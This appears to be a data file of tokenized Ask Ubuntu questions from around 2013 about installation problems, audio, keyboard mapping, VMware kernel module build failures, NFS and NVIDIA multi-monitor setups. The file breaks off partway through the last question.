292008	how to install lotus 9 ?	when i install notes 9 on my ubuntu 13 . 04 its not complete the installation because some depending package see below : hassan @ hassan-ubuntu : ~/downloads/ibm notes 9 $ sudo dpkg -i ibm-notes-9.0.i586.deb [ sudo ] password for hassan : dpkg : regarding ibm-notes-9.0.i586.deb containing ibm-notes , pre-dependency problem : ibm-notes pre-depends on libgnomeprint2.2-0 dpkg : error processing ibm-notes-9.0.i586.deb ( -- install ) : pre-dependency problem - not installing ibm-notes errors were encountered while processing : ibm-notes-9.0.i586.deb
292011	lingot is not working .	i am using ubuntu 12.04 ... i wan to tune my acoustic guitar using lingot ... . but it gives just no response to any sound ... i tried changing the audio_dev = /dev/dsp to audio_dev = /dev/audio as read on a forume but no luck ... . i have logitech headphones.. please , also tell me if i can redirect the system 's sound output to lingot 's sound input so that i can identify the notes of song that is being played ( say in vlc player ) ... my current audio settings of lingot : audio settings : alsa audio device : plughw:0
292019	how to map my enter key to a different key	i need of serious help my enter key just got damaged and i can no longer use the terminal properly . i split drink on my keyboard , all the keys work fine except for the enter key . so i wanted to ask if the is any way i kind map it to a different key as i would or could do with windows thanks for the help
292024	read /dev/ttyusb0 failed ?	i have a gps device connected to /dev/ttyusb0 i wrote a simple code to read data from it but the reading always fails i have no idea where the problem is this is my code could you please help me : ) . # include < iostream > # include < fstream > # include < stdio.h > # include < unistd.h > # include < fcntl.h > # include < errno.h > # include < termios.h > using namespace std ; int read_port ( void ) { int fd ; fd = open ( `` dev/ttyusb0 '' , o_rdwr | o_noctty | o_ndelay ) ; if ( fd ==-1 ) { perror ( `` open_port : unable to open /dev/ttyusb0 - `` ) ; } char buffer [ 32 ] ; int n = read ( fd , buffer , sizeof ( buffer ) ) ; if ( n < 0 ) fputs ( `` read failed ! \n '' , stderr ) ; return ( fd ) ; } int main ( ) { read_port ( ) ; }
292029	is there a software tool / wizard to dual install ubuntu onto a pc with windows 8 ?	i 've been using ubuntu on a laptop which is now dead . i have a shiny new one which came with windows 8 . i would like to put ubuntu on it for dual boot . ive been reading extensively about this , but what 's worrying is the list of user comments after each article saying `` ok , i did all that and now something 's gone horribly wrong.. ! '' . i had a look at wubi but it seems that 's out of date and about to disappear completely . is there / anyone making some gui based software for computer illiterate dorks like me to dual-install ubuntu nicely and easily , accounting for all the uefi , secure boot , compatibility mode , grubs etc problems that seem to be stacked high under every forum i read ? ( and put the fear into me ) . or , of course , point me in the direction of a fool-proof guide which works every time ! thanks !
292042	how to disable sticky edges in ubuntu 13.04	i checked how do i disable mouse magnet on middle edge with multi monitors ? but it does n't work for me . i have two monitor and want to disable the edge resistance and sticky to the edges in ubuntu 13.04 . i set sticky edges to off in displays . with compizconfig i set : overcome_pressure=1 edge stop velocity=1 duration of sticky edge realease=1 i also disabled snapping windows . even so , i 'm still feeling resistance when moving between monitors . also , the windows are attracted to the edges when i move closer . could this be a bug or there are more steps i need to configure to disable such behaviours ? edge_stop_velocity=20
292043	how to unmount nfs when server is gone ?	i am mounting a nfs-folder from a server to my laptop . unforutnately , the server goes off sometimes ... the problem is , that i can not unmount the `` dead '' nfs-folder . on the command-line , i get `` device is buisy '' , and via nautilus it crashes my current session . is there any way to unmount a nfs-folder when the server is off ?
292044	ubuntu 13.04 gnome remix : gnome-shell crashes when changing user/exiting session	as the title says , i got ubuntu 13.04 gnome remix edition , i installed some gnome shell extensions ( application men첫 , netspeed , impatience and user themes ) but i found out that they are not the cause of this problem . anyway , i log in , but when i `` change user '' ( it does n't mean that i log in to another user , i just go back to the gdm ) , and then i log back to my session , the shell crashes and i do n't see any upper bar , and the theme is now ugly . if i 'm lucky , i 'm able to start a terminal , run `` gnome-shell -r '' and restart the shell , but then i have to set again my extensions ( which are now disabled ) and change again the shell theme . i remember something about gnome-session-daemon , but all i found on the net did nothing to me . thanks in advance !
292045	ubuntu updating 13.04 . missing sidebar as well as header bar and mini , maxi and exit button	i 've upgrade my ubuntu 12.10 to 13.04 . i dunno what happend while updating , but i 've lost the launcher bar and header bar . and when i opened the terminal i 've not seen the three buttons ( mini , max and exit ) .
292048	i recently installed the windows installer of ubuntu ( 12.04 ) ( dual boot ) and it is a little buggy	for instance i go to system settings > mouse settings : after changing the mouse settings i go to close the settings and it does n't close unless i right click on the icon and close it . i have no idea why . it tends to happen only when changing the pointer speed ( acceleration and sensitivity ) : after changing i press the close window button and it just sits there
292049	vmware workstation : error , modules must be compiled ... - how to fix ?	when i try to launch vmware-workstation , i get the following error : before you can run vmware , several modules must be compiled and loaded into the kernel cancel / install no errors , when i select install nothing happens just closes . i install manually : sudo apt-get install open-vm-tools open-vm-tools-dev open-vm-dkms open-vm-toolbox open-vm-tools-dev but already installed to the latest versions . i will start a bounty to fix this . ubuntu 13.04 64bit pst007x @ pst007x-serval-professional : ~ $ uname -a linux pst007x-serval-professional 3.9.0-030900-generic # 201304291257 smp mon apr 29 16:58:15 utc 2013 x86_64 x86_64 x86_64 gnu/linux i have uninstalled and reinstalled all components , but same problem . i have tried a different kernel , but end up with the same problem . tried this as suggested : here # ! /bin/bash cd cp -prn /usr/lib/vmware/modules/source /usr/lib/vmware/modules/source-backup mkdir fixed cd fixed find /usr/lib/vmware/modules/source -name `` *.tar '' -exec tar xf ' { } ' \ ; # # add missing header on kernels sed -i '/ # include `` compat_wait.h '' /a\ # include `` compat_sched.h '' ' vmnet-only/vnetuserlistener.c sed -i '/ # include `` compat_page.h '' /a\ # include `` compat_sched.h '' ' vmci-only/include/pgtbl.h # # comment out an invalid definition sed -i 's|\ ( extern void poll_initwait ( compat_poll_wqueues \* ) ; \ ) |//\1| ' *-only/include/compat_wait.h tar cf vmblock.tar vmblock-only tar cf vmci.tar vmci-only tar cf vmmon.tar vmmon-only tar cf vmnet.tar vmnet-only tar cf vmppuser.tar vmppuser-only tar cf vsock.tar vsock-only cp -p *.tar /usr/lib/vmware/modules/source cd /lib/modules/`uname -r`/build/include/linux ln -s ../generated/autoconf.h ln -s ../generated/utsrelease.h cd vmware-modconfig -- console -- install-all # clean up cd rm -rf fixed cd /lib/modules/`uname -r`/build/include/linux rm autoconf.h utsrelease.h cd /usr/lib/vmware/modules/ rm -rf source-backup cd did n't work , results of script in terminal : pst007x @ pst007x-serval-professional : ~/desktop $ sudo ./run [ sudo ] password for pst007x : sed : ca n't read vmci-only/include/pgtbl.h : no such file or directory sed : ca n't read *-only/include/compat_wait.h : no such file or directory tar : vmppuser-only : can not stat : no such file or directory tar : exiting with failure status due to previous errors ln : failed to create symbolic link ‘./autoconf.h’ : file exists ln : failed to create symbolic link ‘./utsrelease.h’ : file exists stopping vmware services : vmware authentication daemon done vm communication interface socket family done virtual machine communication interface done virtual machine monitor done blocking file system done using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-tgleah/vmmon-only' /usr/bin/make -c /lib/modules/3.9.0-030900-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cc [ m ] /tmp/modconfig-tgleah/vmmon-only/linux/driver.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/linux/driverlog.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/linux/hostif.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/common/apic.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/common/comport.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/common/cpuid.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/common/hashfunc.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/common/memtrack.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/common/phystrack.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/common/task.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/common/vmx86.o cc [ m ] /tmp/modconfig-tgleah/vmmon-only/vmcore/moduleloop.o ld [ m ] /tmp/modconfig-tgleah/vmmon-only/vmmon.o building modules , stage 2 . modpost 1 modules cc /tmp/modconfig-tgleah/vmmon-only/vmmon.mod.o ld [ m ] /tmp/modconfig-tgleah/vmmon-only/vmmon.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' /usr/bin/make -c $ pwd srcroot= $ pwd/ . \ modulebuilddir= postbuild make [ 1 ] : entering directory `/tmp/modconfig-tgleah/vmmon-only' make [ 1 ] : `postbuild ' is up to date . make [ 1 ] : leaving directory `/tmp/modconfig-tgleah/vmmon-only' cp -f vmmon.ko ./../vmmon.o make : leaving directory `/tmp/modconfig-tgleah/vmmon-only' using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-tgleah/vmnet-only' /usr/bin/make -c /lib/modules/3.9.0-030900-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cc [ m ] /tmp/modconfig-tgleah/vmnet-only/driver.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/hub.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/userif.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/netif.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/bridge.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/filter.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/procfs.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/smac_compat.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/smac.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/vnetevent.o cc [ m ] /tmp/modconfig-tgleah/vmnet-only/vnetuserlistener.o ld [ m ] /tmp/modconfig-tgleah/vmnet-only/vmnet.o building modules , stage 2 . modpost 1 modules cc /tmp/modconfig-tgleah/vmnet-only/vmnet.mod.o ld [ m ] /tmp/modconfig-tgleah/vmnet-only/vmnet.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' /usr/bin/make -c $ pwd srcroot= $ pwd/ . \ modulebuilddir= postbuild make [ 1 ] : entering directory `/tmp/modconfig-tgleah/vmnet-only' make [ 1 ] : `postbuild ' is up to date . make [ 1 ] : leaving directory `/tmp/modconfig-tgleah/vmnet-only' cp -f vmnet.ko ./../vmnet.o make : leaving directory `/tmp/modconfig-tgleah/vmnet-only' using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-tgleah/vmblock-only' /usr/bin/make -c /lib/modules/3.9.0-030900-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/block.o cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/control.o cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/dentry.o cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/file.o cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/filesystem.o cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/inode.o cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/module.o cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/stubs.o /tmp/modconfig-tgleah/vmblock-only/linux/dentry.c:38:4 : warning : initialisation from incompatible pointer type [ enabled by default ] /tmp/modconfig-tgleah/vmblock-only/linux/dentry.c:38:4 : warning : ( near initialisation for ‘linkdentryops.d_revalidate’ ) [ enabled by default ] /tmp/modconfig-tgleah/vmblock-only/linux/dentry.c : in function ‘dentryoprevalidate’ : /tmp/modconfig-tgleah/vmblock-only/linux/dentry.c:104:7 : warning : passing argument 2 of ‘actualdentry- > d_op- > d_revalidate’ makes integer from pointer without a cast [ enabled by default ] /tmp/modconfig-tgleah/vmblock-only/linux/dentry.c:104:7 : note : expected ‘unsigned int’ but argument is of type ‘struct nameidata *’ cc [ m ] /tmp/modconfig-tgleah/vmblock-only/linux/super.o /tmp/modconfig-tgleah/vmblock-only/linux/control.c : in function ‘executeblockop’ : /tmp/modconfig-tgleah/vmblock-only/linux/control.c:285:9 : warning : assignment from incompatible pointer type [ enabled by default ] /tmp/modconfig-tgleah/vmblock-only/linux/control.c:296:4 : warning : passing argument 1 of ‘putname’ from incompatible pointer type [ enabled by default ] in file included from include/linux/proc_fs.h:5:0 , from /tmp/modconfig-tgleah/vmblock-only/linux/control.c:28 : include/linux/fs.h:2040:13 : note : expected ‘struct filename *’ but argument is of type ‘char *’ /tmp/modconfig-tgleah/vmblock-only/linux/inode.c:49:4 : warning : initialisation from incompatible pointer type [ enabled by default ] /tmp/modconfig-tgleah/vmblock-only/linux/inode.c:49:4 : warning : ( near initialisation for ‘rootinodeops.lookup’ ) [ enabled by default ] ld [ m ] /tmp/modconfig-tgleah/vmblock-only/vmblock.o building modules , stage 2 . modpost 1 modules warning : `` putname '' [ /tmp/modconfig-tgleah/vmblock-only/vmblock.ko ] undefined ! cc /tmp/modconfig-tgleah/vmblock-only/vmblock.mod.o ld [ m ] /tmp/modconfig-tgleah/vmblock-only/vmblock.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' /usr/bin/make -c $ pwd srcroot= $ pwd/ . \ modulebuilddir= postbuild make [ 1 ] : entering directory `/tmp/modconfig-tgleah/vmblock-only' make [ 1 ] : `postbuild ' is up to date . make [ 1 ] : leaving directory `/tmp/modconfig-tgleah/vmblock-only' cp -f vmblock.ko ./../vmblock.o make : leaving directory `/tmp/modconfig-tgleah/vmblock-only' using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-tgleah/vmci-only' /usr/bin/make -c /lib/modules/3.9.0-030900-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cc [ m ] /tmp/modconfig-tgleah/vmci-only/linux/driver.o cc [ m ] /tmp/modconfig-tgleah/vmci-only/linux/vmcikernelif.o cc [ m ] /tmp/modconfig-tgleah/vmci-only/common/vmcicontext.o cc [ m ] /tmp/modconfig-tgleah/vmci-only/common/vmcidoorbell.o cc [ m ] /tmp/modconfig-tgleah/vmci-only/common/vmcidriver.o cc [ m ] /tmp/modconfig-tgleah/vmci-only/common/vmcidatagram.o cc [ m ] /tmp/modconfig-tgleah/vmci-only/common/vmcievent.o cc [ m ] /tmp/modconfig-tgleah/vmci-only/common/vmcihashtable.o /tmp/modconfig-tgleah/vmci-only/linux/driver.c:127:4 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function-declaration ] /tmp/modconfig-tgleah/vmci-only/linux/driver.c:127:4 : error : initialiser element is not constant /tmp/modconfig-tgleah/vmci-only/linux/driver.c:127:4 : error : ( near initialisation for ‘vmci_driver.remove’ ) /tmp/modconfig-tgleah/vmci-only/linux/driver.c:1754:1 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘vmci_probe_device’ /tmp/modconfig-tgleah/vmci-only/linux/driver.c:1982:1 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘vmci_remove_device’ /tmp/modconfig-tgleah/vmci-only/linux/driver.c:119:12 : warning : ‘vmci_probe_device’ used but never defined [ enabled by default ] /tmp/modconfig-tgleah/vmci-only/linux/driver.c:121:13 : warning : ‘vmci_remove_device’ used but never defined [ enabled by default ] /tmp/modconfig-tgleah/vmci-only/linux/driver.c:2063:1 : warning : ‘vmci_interrupt’ defined but not used [ -wunused-function ] /tmp/modconfig-tgleah/vmci-only/linux/driver.c:2137:1 : warning : ‘vmci_interrupt_bm’ defined but not used [ -wunused-function ] /tmp/modconfig-tgleah/vmci-only/linux/driver.c:1717:1 : warning : ‘vmci_enable_msix’ defined but not used [ -wunused-function ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /tmp/modconfig-tgleah/vmci-only/linux/driver.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . make [ 1 ] : *** [ _module_/tmp/modconfig-tgleah/vmci-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' make : *** [ vmci.ko ] error 2 make : leaving directory `/tmp/modconfig-tgleah/vmci-only' unable to install all modules . see log for details . pst007x @ pst007x-serval-professional : ~/desktop $ tried as suggested below , but same issue : pst007x @ pst007x-serval-professional : ~ $ sudo vmware-modconfig -- console -- install-all [ sudo ] password for pst007x : stopping vmware services : vmware authentication daemon done vm communication interface socket family done virtual machine communication interface done virtual machine monitor done blocking file system done using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-ifjtim/vmmon-only' /usr/bin/make -c /lib/modules/3.9.0-030900-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/linux/driver.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/linux/driverlog.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/linux/hostif.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/common/apic.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/common/comport.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/common/cpuid.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/common/hashfunc.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/common/memtrack.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/common/phystrack.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/common/task.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/common/vmx86.o cc [ m ] /tmp/modconfig-ifjtim/vmmon-only/vmcore/moduleloop.o ld [ m ] /tmp/modconfig-ifjtim/vmmon-only/vmmon.o building modules , stage 2 . modpost 1 modules cc /tmp/modconfig-ifjtim/vmmon-only/vmmon.mod.o ld [ m ] /tmp/modconfig-ifjtim/vmmon-only/vmmon.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' /usr/bin/make -c $ pwd srcroot= $ pwd/ . \ modulebuilddir= postbuild make [ 1 ] : entering directory `/tmp/modconfig-ifjtim/vmmon-only' make [ 1 ] : `postbuild ' is up to date . make [ 1 ] : leaving directory `/tmp/modconfig-ifjtim/vmmon-only' cp -f vmmon.ko ./../vmmon.o make : leaving directory `/tmp/modconfig-ifjtim/vmmon-only' using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-ifjtim/vmnet-only' /usr/bin/make -c /lib/modules/3.9.0-030900-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/driver.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/hub.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/userif.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/netif.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/bridge.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/filter.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/procfs.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/smac_compat.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/smac.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/vnetevent.o cc [ m ] /tmp/modconfig-ifjtim/vmnet-only/vnetuserlistener.o ld [ m ] /tmp/modconfig-ifjtim/vmnet-only/vmnet.o building modules , stage 2 . modpost 1 modules cc /tmp/modconfig-ifjtim/vmnet-only/vmnet.mod.o ld [ m ] /tmp/modconfig-ifjtim/vmnet-only/vmnet.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' /usr/bin/make -c $ pwd srcroot= $ pwd/ . \ modulebuilddir= postbuild make [ 1 ] : entering directory `/tmp/modconfig-ifjtim/vmnet-only' make [ 1 ] : `postbuild ' is up to date . make [ 1 ] : leaving directory `/tmp/modconfig-ifjtim/vmnet-only' cp -f vmnet.ko ./../vmnet.o make : leaving directory `/tmp/modconfig-ifjtim/vmnet-only' using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-ifjtim/vmblock-only' /usr/bin/make -c /lib/modules/3.9.0-030900-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/block.o cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/control.o cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/dentry.o cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/file.o cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/filesystem.o cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/inode.o cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/module.o cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/stubs.o /tmp/modconfig-ifjtim/vmblock-only/linux/control.c : in function ‘executeblockop’ : /tmp/modconfig-ifjtim/vmblock-only/linux/control.c:285:9 : warning : assignment from incompatible pointer type [ enabled by default ] /tmp/modconfig-ifjtim/vmblock-only/linux/control.c:296:4 : warning : passing argument 1 of ‘putname’ from incompatible pointer type [ enabled by default ] in file included from include/linux/proc_fs.h:5:0 , from /tmp/modconfig-ifjtim/vmblock-only/linux/control.c:28 : include/linux/fs.h:2040:13 : note : expected ‘struct filename *’ but argument is of type ‘char *’ /tmp/modconfig-ifjtim/vmblock-only/linux/dentry.c:38:4 : warning : initialisation from incompatible pointer type [ enabled by default ] /tmp/modconfig-ifjtim/vmblock-only/linux/dentry.c:38:4 : warning : ( near initialisation for ‘linkdentryops.d_revalidate’ ) [ enabled by default ] /tmp/modconfig-ifjtim/vmblock-only/linux/dentry.c : in function ‘dentryoprevalidate’ : /tmp/modconfig-ifjtim/vmblock-only/linux/dentry.c:104:7 : warning : passing argument 2 of ‘actualdentry- > d_op- > d_revalidate’ makes integer from pointer without a cast [ enabled by default ] /tmp/modconfig-ifjtim/vmblock-only/linux/dentry.c:104:7 : note : expected ‘unsigned int’ but argument is of type ‘struct nameidata *’ /tmp/modconfig-ifjtim/vmblock-only/linux/inode.c:49:4 : warning : initialisation from incompatible pointer type [ enabled by default ] /tmp/modconfig-ifjtim/vmblock-only/linux/inode.c:49:4 : warning : ( near initialisation for ‘rootinodeops.lookup’ ) [ enabled by default ] cc [ m ] /tmp/modconfig-ifjtim/vmblock-only/linux/super.o ld [ m ] /tmp/modconfig-ifjtim/vmblock-only/vmblock.o building modules , stage 2 . modpost 1 modules warning : `` putname '' [ /tmp/modconfig-ifjtim/vmblock-only/vmblock.ko ] undefined ! cc /tmp/modconfig-ifjtim/vmblock-only/vmblock.mod.o ld [ m ] /tmp/modconfig-ifjtim/vmblock-only/vmblock.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' /usr/bin/make -c $ pwd srcroot= $ pwd/ . \ modulebuilddir= postbuild make [ 1 ] : entering directory `/tmp/modconfig-ifjtim/vmblock-only' make [ 1 ] : `postbuild ' is up to date . make [ 1 ] : leaving directory `/tmp/modconfig-ifjtim/vmblock-only' cp -f vmblock.ko ./../vmblock.o make : leaving directory `/tmp/modconfig-ifjtim/vmblock-only' using 2.6.x kernel build system . make : entering directory `/tmp/modconfig-ifjtim/vmci-only' /usr/bin/make -c /lib/modules/3.9.0-030900-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.9.0-030900-generic' cc [ m ] /tmp/modconfig-ifjtim/vmci-only/linux/driver.o cc [ m ] /tmp/modconfig-ifjtim/vmci-only/linux/vmcikernelif.o cc [ m ] /tmp/modconfig-ifjtim/vmci-only/common/vmcicontext.o cc [ m ] /tmp/modconfig-ifjtim/vmci-only/common/vmcidatagram.o cc [ m ] /tmp/modconfig-ifjtim/vmci-only/common/vmcidoorbell.o cc [ m ] /tmp/modconfig-ifjtim/vmci-only/common/vmcidriver.o cc [ m ] /tmp/modconfig-ifjtim/vmci-only/common/vmcihashtable.o cc [ m ] /tmp/modconfig-ifjtim/vmci-only/common/vmcievent.o /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:127:4 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function-declaration ] /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:127:4 : error : initialiser element is not constant /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:127:4 : error : ( near initialisation for ‘vmci_driver.remove’ ) /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:1754:1 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘vmci_probe_device’ /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:1982:1 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘vmci_remove_device’ /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:119:12 : warning : ‘vmci_probe_device’ used but never defined [ enabled by default ] /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:121:13 : warning : ‘vmci_remove_device’ used but never defined [ enabled by default ] /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:2063:1 : warning : ‘vmci_interrupt’ defined but not used [ -wunused-function ] /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:2137:1 : warning : ‘vmci_interrupt_bm’ defined but not used [ -wunused-function ] /tmp/modconfig-ifjtim/vmci-only/linux/driver.c:1717:1 : warning : ‘vmci_enable_msix’ defined but not used [ -wunused-function ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /tmp/modconfig-ifjtim/vmci-only/linux/driver.o ] error 1 make [ 2 ] : *** waiting for unfinished jobs ... . make [ 1 ] : *** [ _module_/tmp/modconfig-ifjtim/vmci-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.9.0-030900-generic' make : *** [ vmci.ko ] error 2 make : leaving directory `/tmp/modconfig-ifjtim/vmci-only' unable to install all modules . see log for details . pst007x @ pst007x-serval-professional : ~ $ sudo apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done build-essential is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . pst007x @ pst007x-serval-professional : ~ $ moderator : i have tried all suggestions in other posts , but they do not address this particular issue . this is not a duplicate , the other postings do not address this specific issue and offer no solutions
292052	install nvidia 319.17 driver	ok i have ubuntu 13.04 i have kernel 3.9 and randr and xorg verrsion need to install new driver . i install new driver from http : //www.nvidia.com/object/linux-display-amd64-319.17-driver.html it no problem in installation but after nvidia-xconfig , nvidia creating config where is not monitor and nvidia device . this is my xorg.conf what nvidia create http : //wklej.to/os4ty/text i taking resollution 640x480 when this config exist . how to create xorg.conf witch full parametrs about my intel hd 4000 and nvidia driver ? i need do this manualy ?
292055	which ubuntu version should i install in this processor type ? amd64 or x86_64	root @ cmovel-lb01 : ~ # lscpu architecture : x86_64 > > > > > > cpu op-mode ( s ) : 64-bit cpu ( s ) : 4 thread ( s ) per core : 1 core ( s ) per socket : 4 cpu socket ( s ) : 1 numa node ( s ) : 1 vendor id : authenticamd > > > > > > cpu family : 16 model : 2 stepping : 3 cpu mhz : 1100.000 virtualization : amd-v l1d cache : 64k l1i cache : 64k l2 cache : 512k l3 cache : 2048k
292057	how to upgrade ubuntu 9.04 ltsp thin client to ubuntu 12.04 ?	i have a setup with ubuntu 9.04 ltsp server and ubuntu 9.04 ltsp thin client . i want to upgrade my ubuntu 9.04 ltsp thin client to ubuntu 12.04 or higher . is it possible to upgrade ? if it is , how can i do that ? guide me on this .
292060	my ubuntu precise 64 bit pc 's boot time is two minutes . is n't that too much ? any idea ?	my ubuntu pc boots up in 2 minutes . first minute goes for greeter session and the second minute goes for user login session . is this normal ? my pc 's main spesifications are as below : ubuntu release : 12.04 ( precise ) 64-bit kernel linux 3.2.0-41-generic ram 3.0 gib processor : intel® core™2 duo cpu p8700 @ 2.53ghz × 2 available disk space : 185.7 gib besides unity i have gnome 3.4.2 shell - kde shell - xfce-xubuntu shell installed in . also i have oracle vm virtualbox that windows vista 32 bit installed in . loaded start up apllications are : jupiter , dropbox , bluetooth , my-weather-indicator , system load indicator , mozilla thunderbird , battery status indicator , wireless , sound settings and the clock . any idea that will let me to make it faster ? thank you very much .
292061	how to configure maas to be able to boot virtual machines	i am running a virtual ( kvm ) maas/juju setup where most of the maas nodes ( including maas master ) are virtual , but some are also physical nodes . the physical dell 1950 nodes configures automatically for boot in maas , so when i deploy via juju they power on automatically . my problem lies in trying to set up boot for virtual systems . i see the posibility in the maas for power type . i can choose virsh . but i need to fill in information i do not know . what should i fill in for driver and power id ? anyone has experience with that ?
292063	desktop pc , two video cards , two monitors , still having problems	first of all , please keep in mind , that i 'm a linux user for a hour or two . this is my first day of migration from windows . so hello ! : ) so , here 's my issue . i have two graphics cards on my desktop machine and i can only plug a single monitor into each of them . i have read countless posts and threads looking for a solution bu had no luck with getting both of my monitors work properly . please help me love ubuntu even more than i do now ! now , some information : both monitors were working nicely before i have installed the nvidia drivers . after that , when i try to boot ubuntu , i see the boot splash screen on one monitora , but when it 's done booting i see the login screen on the monitorb and the boot animation is still stuck on monitora and stays that way . i 'm on ubuntu 13.04 and when i go to system settings- > displays i see only one monitor , clicking detect does n't help at all . lshw -c video *-display description : vga compatible controller product : gt218 [ geforce 210 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia 